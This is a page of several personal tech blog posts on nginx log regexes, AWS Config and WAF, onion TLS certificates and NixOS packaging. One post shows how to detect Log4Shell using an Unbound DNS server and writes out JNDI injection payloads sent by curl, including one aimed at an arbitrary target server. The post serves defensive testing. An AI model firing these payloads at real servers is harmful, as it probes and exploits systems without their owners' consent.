server_ip	192.168.1.2	`(?[\d\.]+)`
server_port	8080	`(?\d+)`
ssl_version	TLSv1.2	`(?\S+)`
ssl_cipher	ECDHE-RSA-AES128-GCM-SHA256	`(?\S+)`
http_cookie	abcdef	`(?\S+)`

nginx is configured as a reverse proxy, proxy_ip is its ip whereas server_ip is the upstream’s.

Proxy request §

Regex §

(?\w+)\s+(?\d+)\s(?[\d\:]+)\s(?[\d\.]+)(?:\snginx\:\s)(?\d{4})\/(?\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?\w+)\](?:\s\d+#\d+\:\s\*\d+\sclient\s)(?[\d\.]+)\:(?\d+)(?:\sconnected\sto\s)(?[\d\.]+)\:(?\d+)

Event §

Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [info] 1776#1776:*114333142 client 1.2.3.4:19802 connected to 192.168.1.2:8080

Fields §

Field	Value	Regex
month	Dec	`(?\w+)`
day	24	`(?\d+)`
time	01:23:45	`(?[\d\:]+)`
proxy_ip	192.168.0.2	`(?[\d\.]+)`
year	2021	`(?\d{4})`
nmonth	12	`(?\d{2})`
log_level	info	`(?\w+)`
remote_ip	1.2.3.4	`(?[\d\.]+)`
remote_port	19802	`(?\d+)`
server_ip	192.168.1.2	`(?[\d\.]+)`
server_port	8080	`(?\d+)`

Upstream error response §

Regex §

(?\w+)\s+(?\d+)\s(?[\d\:]+)\s(?[\d\.]+)(?:\snginx\:\s)(?\d{4})\/(?\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?\w+)\](?:\s\d+#\d+\:\s\*\d+\s)(?.[^,]*)(?:,\sclient\:\s)(?[\d\.]+)(?:,\sserver\:\s)(?.[^,]*)(?:,\srequest\:\s")(?\w+)\s(?\S+)\s(?HTTP/\d\.\d)(?:",\supstream\:\s")(?.[^"]*)",\shost\:\s"(?.[^"]*)

Event §

Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [error] 1776#1776:*71197740 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 1.2.3.4, server: example.com, request: "POST /api/path HTTP/2.0",upstream: "http://192.168.1.2:8080/api/path", host:"example.com"

Fields §

Field	Value	Regex	Explanation
month	Dec	`(?\w+)`
day	24	`(?\d+)`
time	01:23:45	`(?[\d\:]+)`
proxy_ip	192.168.0.2	`(?[\d\.]+)`
year	2021	`(?\d{4})`
nmonth	12	`(?\d{2})`
log_level	error	`(?\w+)`
upstream_error	upstream timed out (110: Connection timed out) while reading response header from upstream	`(?.[^,]*)`	Zero or more of any character except comma
remote_ip	1.2.3.4	`(?[\d\.]+)`
server_host	example.com	`(?.[^,]*)`
http_method	POST	`(?\w+)`
http_path	/api/path	`(?\S+)`
http_version	HTTP/2.0	`(?HTTP/\d\.\d)`
upstream_url	http://192.168.1.2:8080/api/path	`(?.[^"]*)`
upstream_host	example.com	`(?.[^"]*)`

Upstream epoll error §

Regex §

(?\w+)\s+(?\d+)\s(?[\d\:]+)\s(?[\d\.]+)(?:\snginx\:\s)(?\d{4})\/(?\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?\w+)\](?:\s\d+#\d+\:\s\*\d+\s)(?[^,]*,[^,]*)(?:,\sclient\:\s)(?[\d\.]+)(?:,\sserver\:\s)(?.[^,]*)(?:,\srequest\:\s")(?\w+)\s(?\S+)\s(?HTTP/\d\.\d)(?:",\supstream\:\s")(?.[^"]*)(?:",\shost\:\s")(?.[^"]*)

Event §

Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [info] 13199#13199: *81574833 epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while connecting to upstream, client: 1.2.3.4, server: example.com, request: "GET /page.html HTTP/1.1", upstream:"http://192.168.1.2/page.html", host: "example.com"

Fields §

Field	Value	Regex
month	Dec	`(?\w+)`
day	24	`(?\d+)`
time	01:23:45	`(?[\d\:]+)`
proxy_ip	192.168.0.2	`(?[\d\.]+)`
year	2021	`(?\d{4})`
nmonth	12	`(?\d{2})`
log_level	info	`(?\w+)`
upstream_error	epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while connecting to upstream	`(?.[^,]*)`
remote_ip	1.2.3.4	`(?[\d\.]+)`
server_host	example.com	`(?.[^,]*)`
http_method	GET	`(?\w+)`
http_path	/page.html	`(?\S+)`
http_version	HTTP/1.1	`(?HTTP/\d\.\d)`
upstream_url	http://192.168.1.2/page.html	`(?.[^"]*)`
upstream_host	example.com	`(?.[^"]*)`

Upstream epoll error with referrer §

Regex §

(?\w+)\s+(?\d+)\s(?[\d\:]+)\s(?[\d\.]+)(?:\snginx\:\s)(?\d{4})\/(?\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?\w+)\](?:\s\d+#\d+\:\s\*\d+\s)(?[^,]*,[^,]*)(?:,\sclient\:\s)(?[\d\.]+)(?:,\sserver\:\s)(?.[^,]*)(?:,\srequest\:\s")(?\w+)\s(?\S+)\s(?HTTP/\d\.\d)(?:",\supstream\:\s")(?.[^"]*)(?:",\shost\:\s")(?.[^"]*)(?:",\sreferrer\:\s")(?.[^"]*)

Event §

Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [info] 1776#1776:*71220252 epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while sending request to upstream, client: 1.2.3.4, server: example.com, request: "GET /page.html HTTP/1.1", upstream: "http://192.168.1.2:8080/page.html", host: "example.com", referrer: "https://example.com"

Fields §

Field	Value	Regex
month	Dec	`(?\w+)`
day	24	`(?\d+)`
time	01:23:45	`(?[\d\:]+)`
proxy_ip	192.168.0.2	`(?[\d\.]+)`
year	2021	`(?\d{4})`
nmonth	12	`(?\d{2})`
log_level	info	`(?\w+)`
upstream_error	epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while sending request to upstream	`(?.[^,]*)`
remote_ip	1.2.3.4	`(?[\d\.]+)`
server_host	example.com	`(?.[^,]*)`
http_method	GET	`(?\w+)`
http_path	/page.html	`(?\S+)`
http_version	HTTP/1.1	`(?HTTP/\d\.\d)`
upstream_url	http://192.168.1.2:8080/page.html	`(?.[^"]*)`
upstream_host	example.com	`(?.[^"]*)`
referrer	https://example.com	`(?.[^"]*)`

Check Log4Shell vulnerability using Unbound DNS server

2021-12-17T00:00:00.000Z

(Edit: 12 Feb 2022) AWS CDK stack is available at curben/aws-scripts

Most of the publications discussing the Log4Shell/Log4j vulnerability ([1], [2], [3], [4]) focus on the ability to instruct the JNDI component to load remote code or download payload using LDAP. A less known fact is that Log4j also supports DNS protocol by default, at least in versions prior to 2.15.0.

Huntress, a cyber security company, created an easy-to-use tool at log4shell.huntress.com to detect whether your server is vulnerable using LDAP. Despite the assurance of transparency by the availability of source code so you could host it yourself, there’s no denying the fact that log4shell.huntress.com is a third-party service; even if anyone could host it, not everyone has the ability to audit the source code. Another third-party service that is mentioned around is dnslog.cn which detects (as the name implies) using DNS protocol.

Since the DNS request made by Log4j is just a simple DNS lookup—similar to a web browser’s request—we can run any kind of DNS server: authoritative or recursive. Recursive DNS server is the easier option because it simply forwards request to upstream authoritative server(s). If a server is vulnerable, we’ll see its IP address in the DNS server’s query logs when we attempt the exploit.

Setup DNS server §

Unbound is a popular DNS server due to its simplicity. dnsmasq is another option, it was the default dns caching in Ubuntu before being replaced by systemd-resolved.

When installing a server (web, DNS, app, etc), Ubuntu usually starts the service immediately after installation. I prefer to properly configure a server before starting it, so I’m going to mask it first to prevent that auto-start.

Except for checking service status, log and dns query, all commands require sudo privilege.

systemctl mask unbound

Above command may fail in a script, in that case, use ln -s /dev/null /etc/systemd/system/unbound.service instead.

Then, we can proceed to install and configure it.

apt updateapt install unboundsudo -e /etc/unbound/unbound.conf.d/custom.conf

sudo -e is preferred over sudo nano for security reason.

Paste the following config.

# Based on https://www.linuxbabe.com/ubuntu/set-up-unbound-dns-resolver-on-ubuntu-20-04-serverserver:  # the working directory.  directory: "/etc/unbound"  # run as the unbound user  username: unbound  # uncomment and increase to get more logging  # verbosity: 2  # log dns queries  log-queries: yes  # listen on all interfaces,  interface: 0.0.0.0  # comment out to support IPv6.  # interface: ::0  # answer queries from the local network only, change to your private IP  # interface: 192.168.0.2  # perform prefetching of almost expired DNS cache entries.  prefetch: yes  # respond to all IP  access-control: 0.0.0.0/0 allow  # IPv6  # access-control: ::0/0 allow  # respond to local network only, change the CIDR according to your network  # access-control: 192.168.88.0/24 allow  # localhost only  # access-control: 127.0.0.1/24 allow  # hide server info from clients  hide-identity: yes  hide-version: yesremote-control:  # Disable unbound-control  control-enable: noforward-zone:  # Forward all queries to Quad9, use your favourite DNS  name: "."  forward-addr: 9.9.9.9  forward-addr: 149.112.112.112

Ctrl + X to quit, Y to save, Enter to confirm.

With the above config, Unbound will respond to all IP, including public IP if exposed to internet.

Since Unbound will listen on all interfaces, it’ll interfere with systemd-resolved which listens on 127.0.0.53:53 by default. So, before we start Unbound, systemd-resolved needs to be disabled first.

systemctl disable --now systemd-resolved

We also need to add the server’s hostname to /etc/hosts, otherwise sudo will take a long time to execute. If you’re using AWS EC2, the hostname will be “ip-a-b-c-d“ where abcd is the private IP.

sudo -e /etc/hosts# append this line127.0.0.1 ip-a-b-c-d

The last step before we start the service is to configure the firewall to allow inbound DNS traffic. I recommend not to allow all IP (0.0.0.0, ::0), otherwise you’ll get unwanted traffic. In EC2, that means the attached security group.

After we configure the firewall, we can proceed to unmask and start the DNS server.

systemctl unmask unboundsystemctl enable --now unbound

To see whether it’s working, execute some queries:

# localhostdig example.com @127.0.0.1# other machine, same subnetdig example.com @192.168.0.x# other machine over internetdig example.com @public-ip

Verify Unbound is logging queries,

journalctl -xe -u unbound# Dec 14 01:23:45 ip-a-b-c-d unbound[pid]: [pid:0] info: 127.0.0.1 example.com. A IN

We are now ready to test Log4shell vulnerability.

Demo vulnerable app §

This is an optional step to demonstrate Log4shell.

A demo vulnerable is available as a Docker image at christophetd/log4shell-vulnerable-app. For best security practice, I recommend:

Run it in an isolated network or environment.
Clone (the repo) and build it, instead of running the prebuild image.

After building the image and just before you run it, configure the relevant firewall to restrict outbound connection to the Unbound DNS server only. If you prefer to use port 80 for the app server, run docker run -p 80:8080 --name vulnerable-app vulnerable-app. Open inbound port 8080 (or port 80) in the firewall.

To test the app server is reachable, send a test request.

curl -IL app-server-ip:8080 -H 'X-Api-Version: foo'

The app server should respond HTTP 200. The header must be X-Api-Version because that’s what configured in the log4shell-vulnerable-app.

Once the connection is verified, we can now instruct it to make a DNS request to our Unbound DNS.

curl -L app-server-ip:8080 -H 'X-Api-Version: ${jndi:dns://dns-server-ip/evil-request}'

In the Unbound’s log, the query should be listed.

journalctl -xe -u unbound# Dec 14 01:23:45 ip-a-b-c-d unbound[pid]: [pid:0] info: app-server-ip evil-request. A IN

If you want to see the query log in realtime, journalctl -xe -u unbound -f. If it’s not listed, check the inbound firewall rule applied to the DNS server.

Is that server vulnerable? §

curl -L https://target-server-domain -H 'User Agent: ${jndi:dns://dns-server-ip/should-not-show-up-in-the-log}'

Managing inventory: AWS Cloud Control vs Config

2021-10-08T00:00:00.000Z

AWS announced a new API called Cloud Control that provides a standard sets of APIs to manage AWS resources. Imagine running aws cloudcontrol create-resource to launch EC2 and Lambda, instead of using aws ec2 run-instances and aws lambda create-function.

Aside from CRUD operations, it also supports List operation to discover all deployed resources filtered by a specific resource type (e.g. AWS::ECS::Cluster). When I first read the announcement, I wonder how it compares to AWS Config, a feature I’m actively using mainly for security audit, but it could also perform inventory task.

Since Cloud Control is a recent feature, the latest library is required. For Python library, I ran pip install boto3 --upgrade to update it to version xxx. Then, I created a minimal Python script to test out Cloud Control’s ListResources.

#!/usr/bin/env python# ./cloud-control.py --profile profile-name --region region-namefrom argparse import ArgumentParserimport boto3from botocore.config import Configfrom itertools import countfrom json import dump, loadsparser = ArgumentParser(description = 'Find the latest AMIs.')parser.add_argument('--profile', '-p',  help = 'AWS profile name. Parsed from ~/.aws/config (SSO) or credentials (API key).',  required = True)parser.add_argument('--region', '-r',  help = 'AWS Region, e.g. us-east-1',  required = True)args = parser.parse_args()profile = args.profileregion = args.regionsession = boto3.session.Session(profile_name = profile)my_config = Config(region_name = region)client = session.client('cloudcontrol', config = my_config)results = []response = {}for i in count():  # https://docs.aws.amazon.com/cloudcontrolapi/latest/APIReference/API_ListResources.html  params = {    # https://docs.aws.amazon.com/cloudcontrolapi/latest/userguide/supported-resources.html    'TypeName': 'AWS::EC2::FlowLog'  }  if i == 0 or 'NextToken' in response:    if 'NextToken' in response:      params['NextToken'] = response['NextToken']    response = client.list_resources(**params)    results.extend(response['ResourceDescriptions'])  else:    breakprop_list = []# Extract properties onlyfor ele in results:  prop_list.append(loads(ele['Properties']))if len(prop_list) >= 1:  with open('cloud-control.json', 'w') as w:    # Save the first dictionary only    dump(dict(sorted(prop_list[0].items())), w, indent = 2)

In the first draft of the script, I noticed that the API doesn’t support AWS::EC2::Instance yet. It took me a while to troubleshoot until I found this list of supported resources. The error wasn’t very helpful, e.g. “Resource type AWS::EC2::Instance does not support LIST action”. It’s more straightforward to just say “Resource type xxx does not support Cloud Control yet”.

The announcement did mention not all resources are supported, but I didn’t expect AWS’ bread and butter are unsupported, including AWS::S3::Bucket. I’m sure these resources will be supported eventually, it’s just that support of new products are prioritised at the moment as implied from the announcement, “It will support new AWS resources typically on the day of launch”.

I tested on AWS::EC2::PrefixList, instead of the currently unsupported AWS::EC2::Instance. It worked fine, the output syntax is exactly what the documentation outlines. To compare it to Config, I created another equivalent script.

#!/usr/bin/env python# ./aws-config.py --profile profile-name --account-id {account-id} --region region-namefrom argparse import ArgumentParserimport boto3from botocore.config import Configfrom itertools import countfrom json import dump, loadsparser = ArgumentParser(description = 'Find the latest AMIs.')parser.add_argument('--profile', '-p',  help = 'AWS profile name. Parsed from ~/.aws/config (SSO) or credentials (API key).',  required = True)parser.add_argument('--account-id', '-a',  help = 'AWS account ID. See ~/.aws/config if SSO is used.',  required = True,  type = str)parser.add_argument('--region', '-r',  help = 'AWS Region, e.g. us-east-1',  required = True)args = parser.parse_args()profile = args.profileaccount_id = args.account_idregion = args.regionsession = boto3.session.Session(profile_name = profile)my_config = Config(region_name = region)client = session.client('config', config = my_config)results = []response = {}for i in count():  params = {    'Expression': "SELECT configuration WHERE resourceType = 'AWS::EC2::FlowLog'" \      f" AND accountId = '{account_id}'" \      f" AND awsRegion = '{region}'",    'ConfigurationAggregatorName': 'ConfigAggregator' # may need to update  }  if i == 0 or 'NextToken' in response:    if 'NextToken' in response:      params['NextToken'] = response['NextToken']    response = client.select_aggregate_resource_config(**params)    results.extend(response['Results'])  else:    breakconf_list = []# Extract configuration onlyfor ele in results:  conf_list.append(loads(ele).get('configuration', {}))if len(conf_list) >= 1:  with open('aws-config.json', 'w') as w:    # Save the first dictionary only    dump(dict(sorted(conf_list[0].items())), w, indent = 2)

Before I get to the output comparison, notice the accountId and awsRegion filters I used in the SQL statement. It’s necessary because I’m using an aggregator that collects data from all accounts and regions in an AWS Organization (which have AWS Config enabled). Like most other AWS APIs, Cloud Control only works on a combination of account and region. If you want discover resources in 5 combinations of account and region, that’ll requires 5 API calls, in contrast to just one API call via Config’s aggregator.

Here is the output of Cloud Control:

{  "DeliverLogsPermissionArn": String,  "Id": String,  "LogDestination": String,  "LogDestinationType": String,  "LogFormat": String,  "LogGroupName": String,  "MaxAggregationInterval": Integer,  "ResourceId": String,  "ResourceType": String,  "Tags": [ Tag, ... ],  "TrafficType": String}

Config:

{  "creationTime": Float,  "deliverLogsPermissionArn": String,  "deliverLogsStatus": String,  "flowLogId": String,  "flowLogStatus": String,  "logDestination": String,  "logDestinationType": String,  "logFormat": String,  "logGroupName": String,  "maxAggregationInterval": Float,  "resourceId": String,  "tags": [ Tag, ... ],  "trafficType": String}

Syntax used by CloudFormation template:

{  "DeliverLogsPermissionArn" : String,  "LogDestination" : String,  "LogDestinationType" : String,  "LogFormat" : String,  "LogGroupName" : String,  "MaxAggregationInterval" : Integer,  "ResourceId" : String,  "ResourceType" : String,  "Tags" : [ Tag, ... ],  "TrafficType" : String}

Using AWS Config for security compliance and inventory

2021-09-17T00:00:00.000Z

How do I check the patch level of my EC2 instances?

AWS Config is introduced as the answer to the above question, in addition to other compliance requirements. This feature enables a security analyst to query across all accounts (of an organisation) and regions through a single interface. Prior to this feature, you would use SSM to query each and every account and region, which is not efficient.

It includes a comprehensive list of AWS-managed rules, which should meet most compliance requirements, though you can also create a custom rule using a Lambda function. Depending on a company’s industry and regulatory requirements, you could also utilise Conformance Pack which is a set of AWS-managed rules designed to meet certain requirement, e.g. FDA, HIPAA, NIST, PCI DSS.

Compliance report is downloaded using SQL statement. There are two scopes to choose from: either a chosen combination of account and region or organisation level (also known as Configuration Aggregator). To query resource compliance, use AWS::Config::ResourceCompliance resource type. There are many examples included in the Console, you could also run a custom SQL statement using Advanced Query.

In addition to resource compliance, you can also use it to build inventories. For example, you can use AWS::EC2::Instance resource type to list all EC2 instances. So, it can functions as a compliance tool and also an inventory tool.

A major limitation (as listed in the docs) is that you cannot query compliant-only (or non-compliant-only) resources of a compliance rule, e.g. AND operator may return result of OR instead.

To get the actual result, you still need some post-processing to filter out irrelevant entries. I wrote a script to list all enabled rules in an organisation (aws-config-rules.py) and another script to query the output of some of those rules (aws-config.py).

Calculate Web ACL Capacity Unit (WCU) in AWS WAF

2021-07-23T00:00:00.000Z

As part of my routine review of my company’s AWS WAF access control lists (ACLs), I also check the WCU of existing web ACLs to see if an ACL still can fit in more rules until it reaches the 1,500 WCU quota. While checking an ACL’s WCU, I also find it useful to also check WCU of individual rules to locate any rule with larger-than-usual WCU.

While individual and total WCU are shown during ACL creation/modification on the management console, a read-only role could only check the total WCU. It may be possible to use CheckCapacity CLI or API by separating each rule as an ACL, but that’ll involve excessive (online) API calls.

I further improved my script waf-acl.py by implementing offline WCU calculation. While the AWS docs has a complete list of WCU of each match statement, I find the text transformation part is not clear enough.

For each Text transformation that you apply, add 10 WCUs.

It implies that any time you use text transformation, you gotta add 10 units. When I used this assumption, my calculation was off by a mile. It is more accurate to say:

For each unique Text transformation that you apply, add 10 WCUs.

For the purpose of WCU, a text transformation is actually made up of two components: request component and transformation action.

For example, URI path (request component) is transformed to lowercase (a transformation action), (URI path + lowercase) are considered as one unique text transformation. (URI path + lowercase) can be applied multiple times within a rule (through nested statements) and even within an ACL, it will still be counted one transformation only.

This means I need to account for repeated text transformation within a rule, so that it’s calculated only once. This is easily achieved through the use of Python Sets. The same applies when calculating total WCU of an ACL. When a unique text transformation is applied across different rules in an ACL, the sum of all rules’ WCU will be less than the ACL’s WCU.

When transforming a Header, it’s counted based on a specific header. For example, rule A has (Header(User-Agent) + lowercase) and rule B has (Header(Cookies) + lowercase), these are counted as two transformations, so they’ll use 20 WCUs.

Get a ECDSA TLS certificate for your onion service

2021-07-04T00:00:00.000Z

While reading through Tor blog, there was a post back in March 2021 to announce HARICA, a root CA operator, has started selling .onion TLS certificate. The cert is of domain validation (DV) type, significantly easier to purchase and cheaper than Digicert’s extended validation (EV) cert, which was previously the only CA that supports .onion.

The post links to an excellent tutorial. Different from the tutorial, I prefer to use ECDSA cert than RSA, just like Cloudflare’s cert. It includes nginx config, whereas I’m using Caddy web server.

Create a new Cert Manager account in HARICA.
From the Server Certificate on the left sidebar, create a new request for your onion address.
HARICA can generate a Certificate Signing Request (CSR) on your behalf, but I prefer to use an OpenSSL-generated CSR, so I generated and uploaded one.
To generate a CSR using OpenSSL:

# Generate an elliptic-curve private key$ openssl ecparam -name prime256v1 -genkey -noout -out myonion.key# prime256v1 is also used by Cloudflare# Generate a CSR$ openssl req -new -key myonion.key -out myonion.csr# Leave everything blank by entering a dot (.), except for Common Name (CN)# Enter your onion address in CN field

DV cert only requires a valid CN field, it’s optional to enter personal details in the CSR.
Back in Cert Manager, choose “upload a text file to a location on your web server” as the validation option. This option enables you to get wildcard (*.onion.com) cert, necessary if you have subdomain(s) under your onion service.
Instead of uploading a file to web server, I use respond instead.

http://xw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion:8080 {  bind ::1  # Harica CA domain validation  @harica path /.well-known/pki-validation/xxx  respond @harica "yyy"}

Restart Caddy and check the path has correct response. `curl http://localhost:8080/.well-known/pki-validation/xxx -H “Host: your-onion.onion”
After HARICA verified my onion, I received an email notification that it’s ready for purchase and download.
Download the PEM bundle.
- HARICA is transitioning to new root certs. For compatibility with older browsers that have not include the latest root certs yet, the PEM bundle needs to include a cross-cert.
- To download the cross-cert, heads to HARICA repo, select HARICA TLS RSA Root CA 2021 Cross Certificate from HARICA ECC Root CA 2015, 2021 and download PEM.
- Append the cross-cert to the PEM bundle, $ cat pem-bundle.pem cross-cert.pem > fixed-pem-bundle.pem
- More details
Upload “.pem” and “.key” to the server. chown it to the Caddy system user and chmod 600.
Install the cert in Caddy. Site address has to be separated to HTTP and HTTPS blocks due to the use of custom port. When custom port is not used, Caddy listens on port 80 and 443 by default.

# HTTPhttp://xw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion:8080 {  bind ::1  # Redirect to HTTPS  redir https://xw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion{uri} permanent  # HSTS (optional)  header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"}# HTTPSxw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion:8079 {  bind ::1  tls /var/lib/caddy/myonion.pem /var/lib/caddy/myonion.key  header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"  @harica path /.well-known/pki-validation/xxx  respond @harica "yyy"}

Finally, update the Tor config. I configured it via NixOS global config.

configuration.nix
services.tor = {  enable = true;  relay.onionServices = {    myonion = {      version = 3;      map = [{        port = 80;        target = {          addr = "[::1]";          port = 8080;        };      } {        port = 443;        target = {          addr = "[::1]";          port = 8079;        };      }];    };  };};

Using custom package in a NixOS module

2021-07-02T00:00:00.000Z

I recently setup cloudflared on instances that power this website, while I got it working on most of them, it’s not working on IPv6-only instance. There was installation guide which I managed to resolve later (and what this post is about) and Cloudflare tunnel itself doesn’t support IPv6 yet.

A quick recap on two of the main components of NixOS: module and package. A package is a program that is available on NixOS repository, the repo doesn’t contain the binary, it’s made up of nix files that describe how to compile it. In this case, cloudflared.nix is a script to download the source code from GitHub and compile it as a Go program.

A module is (usually) used to install a program as a service and make it configurable via configuration.nix. For example, i2pd.nix module installs i2pd package (pkgs.i2pd) when services.i2pd.enable is enabled.

A major issue is that GitHub doesn’t support IPv6 yet, so my IPv6-only instance couldn’t download the source code. A common workaround is to mirror the repo somewhere else that does support IPv6, which is what I did. Then, I created a new custom package nix:

cloudflared-custom.nixsource
{ lib, buildGoModule, fetchgit }:buildGoModule rec {  pname = "cloudflared";  version = "2021.6.0";  src = fetchgit {    url    = "https://example.com/example/cloudflared-mirror.git";    rev    = "refs/tags/${version}";    sha256 = "sha256-cX0kdBPDgwjHphxGWrnXohHPp1nzs4SnvCry4AxMtp0=";  };  vendorSha256 = null;  doCheck = false;  buildFlagsArray = "-ldflags=-X main.Version=${version}";  meta = with lib; {    description = "CloudFlare Argo Tunnel daemon (and DNS-over-HTTPS client)";    homepage    = "https://www.cloudflare.com/products/argo-tunnel";    license     = licenses.unfree;    platforms   = platforms.unix;    maintainers = [ maintainers.thoughtpolice maintainers.enorris ];  };}

In my cloudflared module, I updated the following lines:

  options.services.argoWeb = {    enable = mkEnableOption "Cloudflare Argo Tunnel";    config = mkOption {      default = "/etc/caddy/argoWeb.yml";      type = types.str;      description = "Path to cloudflared config";    };    dataDir = mkOption {      default = "/var/lib/argoWeb";      type = types.path;      description = ''        The data directory, for storing credentials.      '';    };+    package = mkOption {+      default = pkgs.cloudflared;+      defaultText = "pkgs.cloudflared";+      type = types.package;+      description = "cloudflared package to use.";+    };  };-        ExecStart = "${pkgs.cloudflared}/bin/cloudflared --config ${cfg.config} --no-autoupdate tunnel run";+        ExecStart = "${cfg.package}/bin/cloudflared --config ${cfg.config} --no-autoupdate tunnel run";

Finally, in my configuration.nix, I configured it to use the custom package:

  require = [    /etc/caddy/argoWeb.nix  ];  nixpkgs.config.allowUnfree = true;  services.argoWeb = {    enable = true;+    package = pkgs.callPackage (import /etc/caddy/cloudflared-custom.nix) { };    config = "/etc/caddy/argoWeb.yml";  };

Convert AWS WAF ACLs to human-readable format

2021-06-27T00:00:00.000Z

I regularly need to audit my company’s access control lists (ACLs) implemented in AWS WAF, as part of my job. Each ACL can be more than a thousand lines which is practically impossible to read. I wrote a script that downloads and summarises the ACLs into human-readable format; each one-thousand-line behemoth is transformed into a fifty-line summary that I can actually audit.

The script is available here. It currently only supports Cloudfront ACL, feel free to extend it to support regional ACL.

(Edit: 1 Sep 2021) regional ACL is now supported.

ACL schema §

The underlying format of a web ACL is JSON. In this use case, I’m only concern with two keys:

{  "Name": "",  "Rules": [    {      "Name": "",      "Statement": {},      "Action": {        "Block": {}      }    },    {      "Name": "",      "Statement": {},      "Action": {        "Allow": {}      }    }  ]}

The script names each ACL according to the value of “Name”. “Rules” is an array of objects, where each object represents a rule. Each rule has an action of count, allow or block.

In each rule, there is a statement and it functions as a matching condition. Each statement can contain one or match statements combined using logical rule (AND, NOT, OR).

Converted schema §

A converted ACL has an array of objects, each object has three keys.

[  {    "Name": "",    "Action": "",    "Rule": ""  }]

And/OrStatement §

Original
{  "Name": "ruleA",  "Statement": {    "OrStatement": {      "Statements": [        {          "foo": {}        },        {          "bar": {}        }      ]    }  }}

Converted
{  "ruleA": "foo OR bar"}

Nested And/OrStatement §

Original
{  "Name": "ruleA",  "Statement": {    "AndStatement": {      "Statements": [        {          "OrStatement": {            "Statements": [              {                "foo": {}              },              {                "bar": {}              }            ]          }        },        {          "baz": {}        }      ]    }  }}

Converted
{  "ruleA": "(foo OR bar) AND baz"}

NotStatement §

Original
{  "Name": "ruleA",  "Statement": {    "NotStatement": {      "Statement": {        "foo": {}      }    }  }}

Converted
{  "ruleA": "NOT foo"}

String match §

Orignal
{  "ByteMatchStatement": {    "SearchString": ".conf",    "FieldToMatch": {      "UriPath": {}    },    "PositionalConstraint": "ENDS_WITH"  }}

Converted
UriPath=ENDSWITH(.conf)